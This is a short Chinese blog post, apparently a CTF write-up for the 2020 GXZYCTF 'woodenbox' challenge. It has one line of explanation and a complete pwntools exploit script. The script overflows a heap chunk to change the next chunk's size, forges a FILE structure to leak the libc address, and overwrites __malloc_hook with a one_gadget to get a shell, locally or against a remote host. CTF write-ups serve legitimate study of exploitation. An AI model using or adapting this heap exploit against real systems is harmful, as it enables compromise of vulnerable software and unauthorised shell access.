0%

2020 GXZYCTF woodenbox

发表于 更新于 分类于
本文字数: 2.4k 阅读时长 ≈ 2 分钟

堆溢出,改下一个heap的size,利用文件结构体泄露libc地址。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
#coding=utf-8

##########################################################################
# File Name: pwn_exp.py
# Author: sofr
# mail: rainb0w.541.bai@gmail.com
# Created Time: Sat Mar  7 02:20:54 2020
#########################################################################

from pwn import *
import sys
context.log_level = 'debug'

r = lambda x:p.recv(x)
ru = lambda x:p.recvuntil(x)
s = lambda x:p.send(x)
sl = lambda x:p.sendline(x)
sf = lambda x,y:p.sendafter(x,y)
slf = lambda x,y:p.sendlineafter(x,y)
l64_addr = lambda x:u64(x.ljust(0x8,'\x00'))
l32_addr = lambda x:u32(x.ljust(0x4,'\x00'))
drop_end = lambda x,y:x.split(y)[0]
getshell = lambda :p.interactive()

binary='./woodenbox2'
libc_name = '/lib/x86_64-linux-gnu/libc.so.6'
#libc_name = './libc6_2.23-0ubuntu11_amd64.so'


global p
libc = ELF(libc_name)
bin = ELF(binary)


def ShowAddress(s,addr):
    print('\033[1;31m%s: 0x%x\033[0m'%(s,addr))

def Success(context):
    success('\033[1;32m%s\033[0m'%(context))

def Error(context):
    warn('\033[1;31m%s\033[0m'%(context))

def debug():
    Success(pidof(p))
    raw_input('\033[1;31mDeBug\033[0m')

def add(size,content):
    slf("Your choice:","1")
    slf("Please enter the length of item name:",str(size))
    sf("Please enter the name of item:",content)

def edit(idx,size,content):
    slf("Your choice:","2")
    slf("Please enter the index of item:",str(idx))
    slf("Please enter the length of item name:",str(size))
    sf("item:",content)

def dele(idx):
    slf("Your choice:","3")
    slf("Please enter the index of item:",str(idx))

def pwn():
    global p
    if len(sys.argv) > 1:
        p=remote(sys.argv[1],int(sys.argv[2]))
    else:
        p=process([binary],env={'LD_PRELOAD':libc_name})
    add(0x10,"a")
    add(0x10,"a")
    add(0x10,"a")
    add(0x30,"b")
    add(0x60,"c")
    add(0x10,"a")
    dele(4)
    edit(1,0x20,p64(0xdeadbeef)*2+p64(0)+p64(0xb1))
    dele(2)
    add(0x30,"a")
    edit(1,0x48,p64(0)*7+p64(0x71)+"\xdd\x55")
    #debug()
    add(0x60,"c")
    fake_file = p64(0xfbad1800) + p64(0)*3 + "\x28"
    add(0x60,'\x00'*3+p64(0)*6+fake_file)
    recv = ru('\x7f')
    print recv
    libc_addr = l64_addr(recv[-6:]) - 0x3c5628
    ShowAddress("libc",libc_addr)
    dele(2)
    edit(0,0x48,p64(0)*7+p64(0x71)+p64(libc_addr+0x3c4afd))
    add(0x60,"c")
    one = 0x45216
    one = 0x4526a
    one = 0xf02a4
    #one = 0xf1147
    add(0x60,'\x00'*3+p64(libc_addr+one))
    

    debug()
    getshell()
for i in xrange(30):
    try:
        global p
        pwn()
        break
    except:
        global p
        p.close()